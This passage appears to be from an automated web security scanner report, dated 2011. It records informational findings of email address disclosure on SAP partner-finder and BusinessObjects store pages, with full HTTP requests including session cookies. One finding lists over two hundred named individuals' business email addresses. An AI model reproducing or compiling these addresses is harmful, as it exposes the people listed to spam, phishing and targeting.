s_sess=%20s_cc%3Dtrue%3B%20v18%3D4%3B%20s_sq%3D%3B; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 15 Oct 2011 14:27:45 GMT
Content-Length: 15393


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><titl
...[SNIP]...
<a class="BottomTextLink" href="mailto:sapsmepartnerfinder@verticportals.com ?subject=Questions%20or%20comments%20about%20the%20SAP%20SME%20Partner%20Finder"
target="_blank">sapsmepartnerfinder@verticportals.com</a>
...[SNIP]...
19.6. http://smepartnerfinder.sap.com/services/LeadGeneration/SalesChannelDetails.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://smepartnerfinder.sap.com
Path:   /services/LeadGeneration/SalesChannelDetails.aspx

Issue detail

The following email address was disclosed in the response:

Request

POST /services/LeadGeneration/SalesChannelDetails.aspx HTTP/1.1
Host: smepartnerfinder.sap.com
Proxy-Connection: keep-alive
Content-Length: 33
Origin: http://smepartnerfinder.sap.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
content-type: text/xml
Accept: */*
Referer: http://smepartnerfinder.sap.com/Media/Flash/AppShell.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sdn.sap.com%2firj%2fscn%2fweblogs%3fblog%3d%2fpub%2fwlg%2f26917; mbox=session#1318688512533-813903#1318690710|check#true#1318688910; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ablog%7C1318690649534%3B%20pe%3Dno%2520value%7C1318690649536%3B%20c3%3Dscn%253Ablog%253Abrian%2520bernard%253Atune%2520in%2520to%2520sap%2520teched%2520live%2521%7C1318690649538%3B%20s_nr%3D1318688849551-New%7C1321280849551%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292449554%3B%20s_visit%3D1%7C1318690649555%3B%20gpv_p47%3Dno%2520value%7C1318690649557%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D4%3B%20s_sq%3D%3B; ASP.NET_SessionId=3mmip455whoq0f55gcf2phvg; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493

<formData salesChannelId='790'/>

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 15 Oct 2011 14:29:04 GMT
Content-Length: 1748

<?xml version="1.0" encoding="utf-8"?><content><outcome success="1" reqId="" command="" /><SalesChannel id="790" externalId="38835" isEbmPartner="0" logoUrl="http://smepartnerfinder.sap.com/saleschann
...[SNIP]...
<Email>jacinto.arauz@YASH.com</Email>
...[SNIP]...
19.7. http://smepartnerfinder.sap.com/services/LeadGeneration/SalesChannels.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://smepartnerfinder.sap.com
Path:   /services/LeadGeneration/SalesChannels.aspx

Issue detail

The following email addresses were disclosed in the response:

Request

POST /services/LeadGeneration/SalesChannels.aspx HTTP/1.1
Host: smepartnerfinder.sap.com
Proxy-Connection: keep-alive
Content-Length: 32
Origin: http://smepartnerfinder.sap.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
content-type: text/xml
Accept: */*
Referer: http://smepartnerfinder.sap.com/Media/Flash/AppShell.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sdn.sap.com%2firj%2fscn%2fweblogs%3fblog%3d%2fpub%2fwlg%2f26917; mbox=session#1318688512533-813903#1318690710|check#true#1318688910; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ablog%7C1318690649534%3B%20pe%3Dno%2520value%7C1318690649536%3B%20c3%3Dscn%253Ablog%253Abrian%2520bernard%253Atune%2520in%2520to%2520sap%2520teched%2520live%2521%7C1318690649538%3B%20s_nr%3D1318688849551-New%7C1321280849551%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292449554%3B%20s_visit%3D1%7C1318690649555%3B%20gpv_p47%3Dno%2520value%7C1318690649557%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D4%3B%20s_sq%3D%3B; ASP.NET_SessionId=3mmip455whoq0f55gcf2phvg; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493

<formData frontendVersion='1'/>

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 15 Oct 2011 14:28:29 GMT
Content-Length: 463185

<?xml version="1.0" encoding="utf-8"?><content><outcome success="1" reqId="" command="" /><SalesChannels><SalesChannel id="853" logoUrl="http://smepartnerfinder.sap.com/saleschannel/Media/Image/SalesC
...[SNIP]...
<Email>mark.dendinger@vss-inc.com</Email>
...[SNIP]...
<Email>jeffrey.yefsky@5xtechnology.com</Email>
...[SNIP]...
<Email>e.avizur@abcsi.com</Email>
...[SNIP]...
<Email>jab@abbasoft.com</Email>
...[SNIP]...
<Email>dgrunberg@comcast.net</Email>
...[SNIP]...
<Email>svitlana@accountingmicro.com</Email>
...[SNIP]...
<Email>rscott@achieveits.com</Email>
...[SNIP]...
<Email>rscott@achieveits.com</Email>
...[SNIP]...
<Email>rscott@achieveits.com</Email>
...[SNIP]...
<Email>rscott@achieveits.com</Email>
...[SNIP]...
<Email>joe@teamacuity.biz</Email>
...[SNIP]...
<Email>sdube@acumencorp.com</Email>
...[SNIP]...
<Email>cwise@goadnet.com</Email>
...[SNIP]...
<Email>tyoung@adven-tech.com</Email>
...[SNIP]...
<Email>jeisinger@aetherconsulting.com</Email>
...[SNIP]...
<Email>rnaramore@akili.com</Email>
...[SNIP]...
<Email>jerry_millsap@alexicon.com</Email>
...[SNIP]...
<Email>moswalt@algorithminc.com</Email>
...[SNIP]...
<Email>szimmerman@alteksolutions.com</Email>
...[SNIP]...
<Email>mkean@alticoadvisors.com</Email>
...[SNIP]...
<Email>dfussichen@analytics8.com</Email>
...[SNIP]...
<Email>dcorpuel@andrewscg.com</Email>
...[SNIP]...
<Email>lpenn@answerthink.com</Email>
...[SNIP]...
<Email>lpenn@answerthink.com</Email>
...[SNIP]...
<Email>jmichalski@arcticit.com</Email>
...[SNIP]...
<Email>mseverance@arxistechnology.com</Email>
...[SNIP]...
<Email>mark.andrews@astergroup.com</Email>
...[SNIP]...
<Email>allan.patterson@att.com</Email>
...[SNIP]...
<Email>sarah.finefrock@attuneconsulting.com</Email>
...[SNIP]...
<Email>alanm@audaz.com</Email>
...[SNIP]...
<Email>Avijit@Avianaglobal.com</Email>
...[SNIP]...
<Email>kschottenhamel@b4-consulting.com</Email>
...[SNIP]...
<Email>kschottenhamel@b4-consulting.com</Email>
...[SNIP]...
<Email>sue@benpor.com</Email>
...[SNIP]...
<Email>ewu@blueoceansys.com</Email>
...[SNIP]...
<Email>khuston@bokanyiconsulting.com</Email>
...[SNIP]...
<Email>jculbertson@lookingglassmarketing.com</Email>
...[SNIP]...
<Email>jbell@bramasol.com</Email>
...[SNIP]...
<Email>jbell@bramasol.com</Email>
...[SNIP]...
<Email>jbell@bramasol.com</Email>
...[SNIP]...
<Email>jbell@bramasol.com</Email>
...[SNIP]...
<Email>jrowland@breakaway-inc.com</Email>
...[SNIP]...
<Email>info@broadstreetdata.com</Email>
...[SNIP]...
<Email>tbeckett@btmsolutions.com</Email>
...[SNIP]...
<Email>dabramovitch@btpartners.com</Email>
...[SNIP]...
<Email>ndharia@caarma.com</Email>
...[SNIP]...
<Email>mako.mimura@calsoft.com</Email>
...[SNIP]...
<Email>bradley.little@capgemini.com</Email>
...[SNIP]...
<Email>patrick.gallagher@carahsoft.com</Email>
...[SNIP]...
<Email>jason.bedsworth@cfscg.com</Email>
...[SNIP]...
<Email>mmontanaro@chatsoft.com</Email>
...[SNIP]...
<Email>mnicknish@ciber.com</Email>
...[SNIP]...
<Email>arembert@ccipher.com</Email>
...[SNIP]...
<Email>vraja@clerysys.com</Email>
...[SNIP]...
<Email>vraja@clerysys.com</Email>
...[SNIP]...
<Email>vraja@clerysys.com</Email>
...[SNIP]...
<Email>vraja@clerysys.com</Email>
...[SNIP]...
<Email>skralstein@clientsfirst-us.com</Email>
...[SNIP]...
<Email>Floranne.fanti@cne.com</Email>
...[SNIP]...
<Email>togorman@cohesion.biz</Email>
...[SNIP]...
<Email>togorman@cohesion.biz</Email>
...[SNIP]...
<Email>bburling@column5.com</Email>
...[SNIP]...
<Email>SSussman@Column5.com</Email>
...[SNIP]...
<Email>cmahone@compatl.com</Email>
...[SNIP]...
<Email>carlos@concordsolutions.com</Email>
...[SNIP]...
<Email>mcastrillon@consensusintl.com</Email>
...[SNIP]...
<Email>Info@Kingfisherinc.com</Email>
...[SNIP]...
<Email>melissa.marks@contax.com</Email>
...[SNIP]...
<Email>meridiancomputer@telus.net</Email>
...[SNIP]...
<Email>dave@cornerstone1.com</Email>
...[SNIP]...
<Email>rrodriguez@cptech.com</Email>
...[SNIP]...
<Email>kevin@covient.com</Email>
...[SNIP]...
<Email>kevin@covient.com</Email>
...[SNIP]...
<Email>kevin@covient.com</Email>
...[SNIP]...
<Email>kevin@covient.com</Email>
...[SNIP]...
<Email>kevin@covient.COM</Email>
...[SNIP]...
<Email>sales@crystalclearbusiness.com</Email>
...[SNIP]...
<Email>jdelozier@d1tech.net</Email>
...[SNIP]...
<Email>jdelozier@d1tech.net</Email>
...[SNIP]...
<Email>jdelozier@d1tech.net</Email>
...[SNIP]...
<Email>jdelozier@d1tech.net</Email>
...[SNIP]...
<Email>BBELL@DALCOM.COM</Email>
...[SNIP]...
<Email>JGREENE@DALCOM.COM</Email>
...[SNIP]...
<Email>garyb@datasensesolutions.com</Email>
...[SNIP]...
<Email>greg.taylor@decisionfirst.com</Email>
...[SNIP]...
<Email>vermeulend@delaware.be</Email>
...[SNIP]...
<Email>cbolivar@deloitte.com</Email>
...[SNIP]...
<Email>cbolivar@deloitte.com</Email>
...[SNIP]...
<Email>todd@demandsolutionsgroup.com</Email>
...[SNIP]...
<Email>phil@techead.com</Email>
...[SNIP]...
<Email>steve.woodgate@diagonal-consulting.com</Email>
...[SNIP]...
<Email>tgregson@dicentral.com</Email>
...[SNIP]...
<Email>haley.f@dickinson-assoc.com</Email>
...[SNIP]...
<Email>steve.rafac@dmctechgroup.com</Email>
...[SNIP]...
<Email>Steve.Rafac@dmctechgroup.com</Email>
...[SNIP]...
<Email>david@domain-group.com</Email>
...[SNIP]...
<Email>tgreen@dunnsolutions.com</Email>
...[SNIP]...
<Email>tgreen@dunnsolutions.com</Email>
...[SNIP]...
<Email>tgreen@dunnsolutions.com</Email>
...[SNIP]...
<Email>tgreen@dunnsolutions.com</Email>
...[SNIP]...
<Email>lhenslee@e2btek.com</Email>
...[SNIP]...
<Email>bly@edgewater.com</Email>
...[SNIP]...
<Email>mitch@emanet.com</Email>
...[SNIP]...
<Email>swking@ecs-online.com</Email>
...[SNIP]...
<Email>Abhijit.Purkayastha@e5sol.com</Email>
...[SNIP]...
<Email>pbarolet@emergent360.com</Email>
...[SNIP]...
<Email>mraman@emergys.com</Email>
...[SNIP]...
<Email>mraman@emergys.com</Email>
...[SNIP]...
<Email>rkrishnan@encoress.com</Email>
...[SNIP]...
<Email>info@ertgroup.com</Email>
...[SNIP]...
<Email>pmartin@entrypointconsulting.com</Email>
...[SNIP]...
<Email>pmartin@entrypointconsulting.com</Email>
...[SNIP]...
<Email>Henri.Eberhardt@equal-plus.com</Email>
...[SNIP]...
<Email>grant.small@erpcontrol.com</Email>
...[SNIP]...
<Email>nancy@erplogic.com</Email>
...[SNIP]...
<Email>robert.eppele@erpsolutions.net</Email>
...[SNIP]...
<Email>j.gabrys@vbs411.com</Email>
...[SNIP]...
<Email>jkoski@estesgrpllc.com</Email>
...[SNIP]...
<Email>tad.bungener@et-alia.com</Email>
...[SNIP]...
<Email>terrymikloucich@exaserv.com</Email>
...[SNIP]...
<Email>jevans@excelsior-consulting.com</Email>
...[SNIP]...
<Email>dspann@clarkstonconsulting.com</Email>
...[SNIP]...
<Email>jhuskins@fonteva.com</Email>
...[SNIP]...
<Email>dchampoux@forgestik.com</Email>
...[SNIP]...
<Email>jnolan@fourincorp.com</Email>
...[SNIP]...
<Email>jetherington@fusionconsultinginc.com</Email>
...[SNIP]...
<Email>jacinto.arauz@YASH.com</Email>
...[SNIP]...
<Email>shivaji@geniusbsi.com</Email>
...[SNIP]...
<Email>guy.caron@gpcsystems.com</Email>
...[SNIP]...
<Email>Mike.Zapko@us.gt.com</Email>
...[SNIP]...
<Email>randy.christiansen@gt.com</Email>
...[SNIP]...
<Email>Tony.Yocham@us.gt.com</Email>
...[SNIP]...
<Email>allan.vdheyden@gryffyns.com</Email>
...[SNIP]...
<Email>michael.bujarski@hcdataworks.com</Email>
...[SNIP]...
<Email>pekkan@hrlg.com</Email>
...[SNIP]...
<Email>nmangran@us.ibm.com</Email>
...[SNIP]...
<Email>nmangran@us.ibm.com</Email>
...[SNIP]...
<Email>nmangran@us.ibm.com</Email>
...[SNIP]...
<Email>nmangran@us.ibm.com</Email>
...[SNIP]...
<Email>gfeldman@i-bn.net</Email>
...[SNIP]...
<Email>laurie.greenberg@idhasoft.com</Email>
...[SNIP]...
<Email>laurie.greenberg@idhasoft.com</Email>
...[SNIP]...
<Email>laurie.greenberg@idhasoft.com</Email>
...[SNIP]...
<Email>laurie.greenberg@idhasoft.com</Email>
...[SNIP]...
<Email>philippe.desmedt@idhasoft.com</Email>
...[SNIP]...
<Email>Garey.gomez@ids-scheer.com</Email>
...[SNIP]...
<Email>sandeep.bangal@ids-scheer.com</Email>
...[SNIP]...
<Email>boston@illumiti.com</Email>
...[SNIP]...
<Email>houston@illumiti.com</Email>
...[SNIP]...
<Email>cmink@infodatacorp.com</Email>
...[SNIP]...
<Email>rreopell@iccohio.com</Email>
...[SNIP]...
<Email>tstanard@infosol.com</Email>
...[SNIP]...
<Email>Dan.Kubicz@bull.com</Email>
...[SNIP]...
<Email>dproulx@inv-s.com</Email>
...[SNIP]...
<Email>jlaplant@integresystems.com</Email>
...[SNIP]...
<Email>alok.pant@intelligroup.com</Email>
...[SNIP]...
<Email>aboerstra@intricity.com</Email>
...[SNIP]...
<Email>pgrillo@iserviceglobe.com</Email>
...[SNIP]...
<Email>laure.poquette@itelligencegroup.com</Email>
...[SNIP]...
<Email>laure.poquette@itelligencegroup.com</Email>
...[SNIP]...
<Email>laure.poquette@itelligencegroup.com</Email>
...[SNIP]...
<Email>laure.poquette@itelligencegroup.com</Email>
...[SNIP]...
<Email>laure.poquette@itelligencegroup.com</Email>
...[SNIP]...
<Email>laure.poquette@itelligencegroup.com</Email>
...[SNIP]...
<Email>michelle.egan@itelligencegroup.com</Email>
...[SNIP]...
<Email>mohant@jaypar.com</Email>
...[SNIP]...
<Email>dgilmore@jumppointinc.com</Email>
...[SNIP]...
<Email>fsposato@jumppointinc.com</Email>
...[SNIP]...
<Email>jbarnes@jumppoint.ca</Email>
...[SNIP]...
<Email>vinay.ahuja@kbms.com</Email>
...[SNIP]...
<Email>vinay.ahuja@kbms.com</Email>
...[SNIP]...
<Email>dave@kerr-consulting.com</Email>
...[SNIP]...
<Email>ddonarski@kolbco.com</Email>
...[SNIP]...
<Email>BBELLEMORE@LSICONSULTING.COM</Email>
...[SNIP]...
<Email>steve.bradley@learn2perform.com</Email>
...[SNIP]...
<Email>victor.lozinski@leverx.com</Email>
...[SNIP]...
<Email>scott@lbsi.com</Email>
...[SNIP]...
<Email>scott@lbsi.com</Email>
...[SNIP]...
<Email>scott@lbsi.com</Email>
...[SNIP]...
<Email>scott@lbsi.com</Email>
...[SNIP]...
<Email>scott@lbsi.com</Email>
...[SNIP]...
<Email>lwintonick@lpsconsulting.com</Email>
...[SNIP]...
<Email>lwintonick@lpsconsulting.com</Email>
...[SNIP]...
<Email>mru@m2-d2.com</Email>
...[SNIP]...
<Email>duane.bosch@madiba.com</Email>
...[SNIP]...
<Email>davem@manageinc.com</Email>
...[SNIP]...
<Email>doug.turner@mantis-tgi.com</Email>
...[SNIP]...
<Email>tbeggs@m10tek.com</Email>
...[SNIP]...
<Email>BILL@MAXIMUMINSIGHTS.COM</Email>
...[SNIP]...
<Email>kevin@mcmanusconsulting.com</Email>
...[SNIP]...
<Email>mike@mcsgroup.com</Email>
...[SNIP]...
<Email>rmichell@michellgroup.com</Email>
...[SNIP]...
<Email>emcguardian@mig.com</Email>
...[SNIP]...
<Email>richard.lin@mile5solutions.com</Email>
...[SNIP]...
<Email>debbie@minimaxinfo.com</Email>
...[SNIP]...
<Email>brian.bartoldson@diagonal-consulting.com</Email>
...[SNIP]...
<Email>sam.wood@mowyattsolutions.com</Email>
...[SNIP]...
<Email>rbearden@munics.com</Email>
...[SNIP]...
<Email>mallibi.monasterio@nbteamconsulting.com</Email>
...[SNIP]...
<Email>ado.sahovic@nbs-us.com</Email>
...[SNIP]...
<Email>ado.sahovic@nbs-us.com</Email>
...[SNIP]...
<Email>bill.donovan@nbs-us.com</Email>
...[SNIP]...
<Email>curtis.maxwell@nbs-us.com</Email>
...[SNIP]...
<Email>danielle.mesich@nbs-us.com</Email>
...[SNIP]...
<Email>david.snyder@nbs-us.com</Email>
...[SNIP]...
<Email>george.yankovich@nbs-us.com</Email>
...[SNIP]...
<Email>grant.fraser@nbs-us.com</Email>
...[SNIP]...
<Email>greg.woodward@nbs-us.com</Email>
...[SNIP]...
<Email>jared.hageman@nbs-us.com</Email>
...[SNIP]...
<Email>jon.odalen@nbs-us.com</Email>
...[SNIP]...
<Email>jon.odalen@nbs-us.com</Email>
...[SNIP]...
<Email>ken.eldridge@nbs-us.com</Email>
...[SNIP]...
<Email>ken.eldridge@nbs-us.com</Email>
...[SNIP]...
<Email>nick.glowacki@nbs-us.com</Email>
...[SNIP]...
<Email>tony.shanine@nbs-us.com</Email>
...[SNIP]...
<Email>zach.connelly@nbs-us.com</Email>
...[SNIP]...
<Email>ray.russ@neoris.com</Email>
...[SNIP]...
<Email>jdemarco@neosystemscorp.com</Email>
...[SNIP]...
<Email>jdemarco@neosystemscorp.com</Email>
...[SNIP]...
<Email>brian@nsbizsolutions.com</Email>
...[SNIP]...
<Email>info@niefert.com</Email>
...[SNIP]...
<Email>dparent@nwaretech.com</Email>
...[SNIP]...
<Email>dparent@nwaretech.com</Email>
...[SNIP]...
<Email>dparent@nwaretech.com</Email>
...[SNIP]...
<Email>khoffman@otsi-usa.com</Email>
...[SNIP]...
<Email>mbeckerle@oco-inc.com</Email>
...[SNIP]...
<Email>mohan.bachal@optimalsol.com</Email>
...[SNIP]...
<Email>Elliott.garofalo@optimalsol.com</Email>
...[SNIP]...
<Email>brad@orchestrateam.com</Email>
...[SNIP]...
<Email>brad@orchestrateam.com</Email>
...[SNIP]...
<Email>brad@orchestrateam.com</Email>
...[SNIP]...
<Email>tschippert@paradigmanalytics.com</Email>
...[SNIP]...
<Email>GUARNERI@OLAP.COM</Email>
...[SNIP]...
<Email>mark.floersch@peopleservices.biz</Email>
...[SNIP]...
<Email>Bram.Ayoo@pinion-inc.com</Email>
...[SNIP]...
<Email>senthil@pitechsol.com</Email>
...[SNIP]...
<Email>matt.gray@pointsolutionsllc.com</Email>
...[SNIP]...
<Email>acrigger@preferredstrategies.com</Email>
...[SNIP]...
<Email>Sjancay@prequelsolutions.com</Email>
...[SNIP]...
<Email>lhall@quantumsoftwarellc.com</Email>
...[SNIP]...
<Email>leslie.buttorff@quintel-mc.com</Email>
...[SNIP]...
<Email>michael.anderson@radiant.us.com</Email>
...[SNIP]...
<Email>dhowe@realsolutions-na.com</Email>
...[SNIP]...
<Email>rhowe@realsolutions-na.com</Email>
...[SNIP]...
<Email>rhowe@realsolutions-na.com</Email>
...[SNIP]...
<Email>michael.wallace@resultdata.com</Email>
...[SNIP]...
<Email>info@rjtcompuquest.com</Email>
...[SNIP]...
<Email>ksmolkowicz@rpfconsulting.com</Email>
...[SNIP]...
<Email>stan.mork@rsmi.com</Email>
...[SNIP]...
<Email>stan.mork@rsmi.com</Email>
...[SNIP]...
<Email>jbrasch@rune2e.com</Email>
...[SNIP]...
<Email>haranath.gnana@saama.com</Email>
...[SNIP]...
<Email>Faith.Bankole@sabrix.com</Email>
...[SNIP]...
<Email>djampo@olap.com</Email>
...[SNIP]...
<Email>victoria.park@sapphiresystems.com</Email>
...[SNIP]...
<Email>victoria.park@sapphiresystems.com</Email>
...[SNIP]...
<Email>jlouw@satreno.com</Email>
...[SNIP]...
<Email>psiegel@sensecorp.com</Email>
...[SNIP]...
<Email>vsaha@sererra.com</Email>
...[SNIP]...
<Email>Dmilne@sgstech.com</Email>
...[SNIP]...
<Email>jdrumm@sikich.com</Email>
...[SNIP]...
<Email>jdrumm@sikich.com</Email>
...[SNIP]...
<Email>jdrumm@sikich.com</Email>
...[SNIP]...
<Email>info@sitacorp.com</Email>
...[SNIP]...
<Email>jhughes@skyytek.com</Email>
...[SNIP]...
<Email>Hughesjhughes@skyytek.com</Email>
...[SNIP]...
<Email>sdreyer@smasystems.com</Email>
...[SNIP]...
<Email>sue.perez@sba-itsolutions.com</Email>
...[SNIP]...
<Email>bryank@SOFTEKSI.COM</Email>
...[SNIP]...
<Email>blederman@softengineusa.com</Email>
...[SNIP]...
<Email>akuznetsov@softengineusa.com</Email>
...[SNIP]...
<Email>akuznetsov@softengineusa.com</Email>
...[SNIP]...
<Email>ken.kucera@solutionsworkforce.com</Email>
...[SNIP]...
<Website>ken.kucera@solutionsworkforce.com</Website>
...[SNIP]...
<Email>bgordon@spartaconsulting.com</Email>
...[SNIP]...
<Email>CARLOS.MARTINEZ@SSPCORP.COM</Email>
...[SNIP]...
<Email>sreenivas@scubeinc.net</Email>
...[SNIP]...
<Email>jsproles@supportone.us</Email>
...[SNIP]...
<Email>kpayne@synesisintl.com</Email>
...[SNIP]...
<Email>jenn.bridge@systemlinkonline.com</Email>
...[SNIP]...
<Email>ekoss@sytecg.com</Email>
...[SNIP]...
<Email>ray.conrad@tahoe-partners.com</Email>
...[SNIP]...
<Email>ray.conrad@tahoe-partners.com</Email>
...[SNIP]...
<Email>ray.conrad@tahoe-partners.com</Email>
...[SNIP]...
<Email>ray.conrad@tahoe-partners.com</Email>
...[SNIP]...
<Email>sanjay.goradia@takesolutions.com</Email>
...[SNIP]...
<Email>shawn.tibbitts@tegrous.com</Email>
...[SNIP]...
<Email>shawn.tibbitts@tegrous.com</Email>
...[SNIP]...
<Email>mamtaa@terrainformation.com</Email>
...[SNIP]...
<Email>chris.coffing@coffingco.com</Email>
...[SNIP]...
<Email>sgreen@glenture.com</Email>
...[SNIP]...
<Email>nick.salamone@tpcus.com</Email>
...[SNIP]...
<Email>nick.salamone@tpcus.com</Email>
...[SNIP]...
<Email>nick.salamone@tpcus.com</Email>
...[SNIP]...
<Email>nick.salamone@tpcus.com</Email>
...[SNIP]...
<Email>ranker@reveregroup.com</Email>
...[SNIP]...
<Email>ranker@reveregroup.com</Email>
...[SNIP]...
<Email>ranker@reveregroup.com</Email>
...[SNIP]...
<Email>Korey.Lind@twbs.com</Email>
...[SNIP]...
<Email>korey.lind@twbs.com</Email>
...[SNIP]...
<Email>korey.lind@twbs.com</Email>
...[SNIP]...
<Email>korey.lind@twbs.com</Email>
...[SNIP]...
<Email>korey.lind@twbs.com</Email>
...[SNIP]...
<Email>korey.lind@twbs.com</Email>
...[SNIP]...
<Email>kuttym@sbcglobal.net</Email>
...[SNIP]...
<Email>mumtazkutty@transweaveinc.com</Email>
...[SNIP]...
<Email>scott.frandsen@trimergo.com</Email>
...[SNIP]...
<Email>Kevin@twistsolutions.com</Email>
...[SNIP]...
<Email>allan.vdheyden@ucs-solutions.com</Email>
...[SNIP]...
<Email>jhirst@virtual-consulting.com</Email>
...[SNIP]...
<Email>sarah-coish@vision-33.com</Email>
...[SNIP]...
<Email>sarah.coish@vision-33.com</Email>
...[SNIP]...
<Email>sarah.coish@vision-33.com</Email>
...[SNIP]...
<Email>sarah-coish@vision-33.com</Email>
...[SNIP]...
<Email>sarah.coish@vision-33.com</Email>
...[SNIP]...
<Email>sarah.coish@vision-33.com</Email>
...[SNIP]...
<Email>sarah.coish@vision-33.com</Email>
...[SNIP]...
<Email>sarah.coish@vision-33.com</Email>
...[SNIP]...
<Email>sarah.coish@vision-33.com</Email>
...[SNIP]...
<Email>sarah.coish@vision-33.com</Email>
...[SNIP]...
<Email>smcmahon@apollocon.com</Email>
...[SNIP]...
<Email>jory.lamb@vistavusolutions.com</Email>
...[SNIP]...
<Email>Robert.Distler@waccg.com</Email>
...[SNIP]...
<Email>marty@wciconsulting.com</Email>
...[SNIP]...
<Email>lkurriger@whitelightgrp.com</Email>
...[SNIP]...
<Email>quaid@witinc.com</Email>
...[SNIP]...
<Email>gwicker@woodburn.com</Email>
...[SNIP]...
<Email>Nageswaric@wyvilsystems.com</Email>
...[SNIP]...
<Email>dora@xenonc.com</Email>
...[SNIP]...
<Email>Jacinto.Arauz@yash.com</Email>
...[SNIP]...
<Email>kara.ferry@yash.com</Email>
...[SNIP]...
<Email>tony.king@zeriongroup.com</Email>
...[SNIP]...
19.8. http://store.businessobjects.com/DRHM/Storefront/Site/bobjamer/cm/multimedia/Redesign_2011/js/functionsandplugins.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.businessobjects.com
Path:   /DRHM/Storefront/Site/bobjamer/cm/multimedia/Redesign_2011/js/functionsandplugins.js

Issue detail

The following email addresses were disclosed in the response:

Request

GET /DRHM/Storefront/Site/bobjamer/cm/multimedia/Redesign_2011/js/functionsandplugins.js HTTP/1.1
Host: store.businessobjects.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://store.businessobjects.com/store/bobjamer/DisplayHomePage/pgm.+77298800?_s_icmp=CG4DA4BC51&resid=TmOIUAoBAlUAAARDMJwAAAAN&rests=1318689037443
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ORA_WX_SESSION="10.1.2.194:260-0#0"; JSESSIONID=0A6E08D05288243D3676FD314938750B; VISITOR_ID=971D4E8DFAED43679E246899D1DA9F034AAC40FA94AD0B51; bobjamer.pgm=" 77298800"; BIGipServerp-drh-dc1pod5-pool1-active=3254911242.260.0000

Response

HTTP/1.1 200 OK
Cache-Control: max-age=157788000
Expires: Tue, 11 Oct 2016 21:41:38 GMT
ETag: "aa8d-4e098a04"
Content-Type: application/x-javascript
Last-Modified: Tue, 28 Jun 2011 08:00:04 GMT
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (G;max-age=7200+0;age=0;ecid=96207126677,0)
Content-Length: 43661
Date: Wed, 12 Oct 2011 15:41:38 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc1app50
Accept-Ranges: bytes

/* ===== FUNCTIONS ===== */


/*-- Ajax Autocomplete for jQuery, version 1.1.3 > URL: http://www.devbridge.com/projects/autocomplete/ --*/
(function(d){function l(b,a,c){a="("+c.replace(m,"\\$1")+
...[SNIP]...
rst').click();
               startRotateHome();
           } else { $('#hero-rotator li').css('display','block'); }
           
           
                               }
   }
   
   
// JQUERY DIMENSIONS PLUGIN
